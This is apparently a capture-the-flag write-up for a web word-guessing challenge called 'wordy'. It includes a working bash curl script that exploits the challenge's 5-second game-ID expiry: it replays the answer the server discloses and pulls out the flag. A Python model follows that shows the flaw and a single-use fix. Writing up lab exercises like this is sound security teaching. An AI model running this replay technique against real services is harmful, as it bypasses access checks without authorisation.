Tags: web scripting
The task website challenges us to guess a five-character word. If the guessed word is correct, it gives us the flag; otherwise the correct guess is returned alongside a new game id.
If we try to resend the correct guess with the old game id, we get the error message below:
> Expired or invalid game ID. Games are deleted 5 seconds after your guess to reduce memory usage.
As mentioned above, games are deleted 5 seconds after making a guess, so if we are able to resend the correct guess before the 5 seconds expire, we can get the flag. This leads us to use an automated script; our bash script is below:
```
#!/bin/bash
# Base URL of the challenge API
base=https://uscg-web-wordy-w7vmh474ha-uc.a.run.app/api

# Get the game id; the braces are stripped so the key/value pair can be reused in the JSON bodies below
game_id=$(curl -s "$base/game" | sed 's/[{}]//g')
echo "[+]New game: $game_id"

# Get the correct guess by sending a wrong one; the first field of the response is kept with its quotes
echo "{\"guess\":\"test0\", $game_id}" > cookie
guess=$(curl -s -X POST -H 'Content-Type: application/json' "$base/guess" -d @cookie | cut -d, -f1 | cut -d: -f2)
echo "[-]Guess should be: $guess"

# Send back the correct guess before the 5 seconds expire
echo "{\"guess\":$guess, $game_id}" > cookie
flag=$(curl -s -X POST -H 'Content-Type: application/json' "$base/guess" -d @cookie | sed 's/.*\(USCG{[a-zA-Z0-9_-]*}\).*/\1/g')
echo "[+]Here is your flag: $flag"
```
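The server-side flaw behind this replay, and its fix, can be modelled in a few lines. This is an added example, not the challenge's actual code: `GameStore`, `replay`, the sample answer and the placeholder flag are all constructed, and the model assumes the server starts the 5-second deletion timer on the first guess while leaving the game playable.

```python
import secrets

GRACE_SECONDS = 5  # deletion delay quoted in the challenge's error message


class GameStore:
    """Constructed in-memory model of the game API; all names are hypothetical."""

    def __init__(self, single_use):
        self.single_use = single_use
        self.games = {}  # game_id -> [answer, expires_at or None]

    def new_game(self, answer):
        game_id = secrets.token_hex(8)
        self.games[game_id] = [answer, None]
        return game_id

    def guess(self, game_id, word, now):
        game = self.games.get(game_id)
        if game is None or (game[1] is not None and now >= game[1]):
            self.games.pop(game_id, None)
            return {"error": "Expired or invalid game ID."}
        answer = game[0]
        if self.single_use:
            # Hardened: the game is consumed before anything is revealed.
            del self.games[game_id]
        elif game[1] is None:
            # Weak: the game stays playable until the delayed cleanup runs.
            game[1] = now + GRACE_SECONDS
        if word == answer:
            return {"flag": "FLAG{constructed-placeholder}"}
        return {"answer": answer}


def replay(store, delay):
    """Wrong guess, then resubmit the disclosed answer `delay` seconds later."""
    game_id = store.new_game("crane")  # constructed sample answer
    first = store.guess(game_id, "test0", now=0.0)
    return store.guess(game_id, first["answer"], now=delay)
```

With `single_use=True` the game is removed in the same step that discloses the answer, so memory cleanup no longer doubles as the only barrier against a second guess.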